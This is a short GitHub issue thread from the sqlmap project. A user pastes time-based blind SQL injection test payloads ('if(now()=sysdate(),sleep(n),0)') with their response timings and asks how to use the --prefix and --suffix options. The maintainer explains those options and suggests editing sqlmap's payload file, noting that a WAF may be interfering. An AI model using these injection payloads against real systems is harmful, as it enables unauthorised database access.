### ISSUE TITLE
HELP !   how to apply --prefix = and --suffix =

### ISSUE THREAD

**Issue by fanatos123** [sqlmapproject/sqlmap#3456]
HELP !
How to apply --prefix = and --suffix = ?

Attack details

URL encoded GET input P was set to if(now()=sysdate(),sleep(0),0)

Tests performed:

    if(now()=sysdate(),sleep(5.567),0) => 13.723
    if(now()=sysdate(),sleep(0),0) => 0.148
    if(now()=sysdate(),sleep(11.134),0) => 15.055
    if(now()=sysdate(),sleep(16.701),0) => 19.862
    if(now()=sysdate(),sleep(0),0) => 0.166
    if(now()=sysdate(),sleep(0),0) => 0.166
    if(now()=sysdate(),sleep(0),0) => 0.164
    if(now()=sysdate(),sleep(11.134),0) => 17.235
    if(now()=sysdate(),sleep(0),0) => 0.163

**Comment by stamparm** [comment]
`--prefix` and `--suffix` should not contain payload parts inside, only BOUNDARIES. Take a look [here](https://github.com/sqlmapproject/sqlmap/wiki/Usage#custom-injection-payload).

I would suggest you to take a look into [time_blind.xml](https://github.com/sqlmapproject/sqlmap/blob/master/xml/payloads/time_blind.xml) and try to modify one of those to suite your needs.

Also, it is very strange that current payloads are not able to detect it. I would guess that you have some WAF in between. In such case sqlmap most probably won't be able to help you (out of the box)
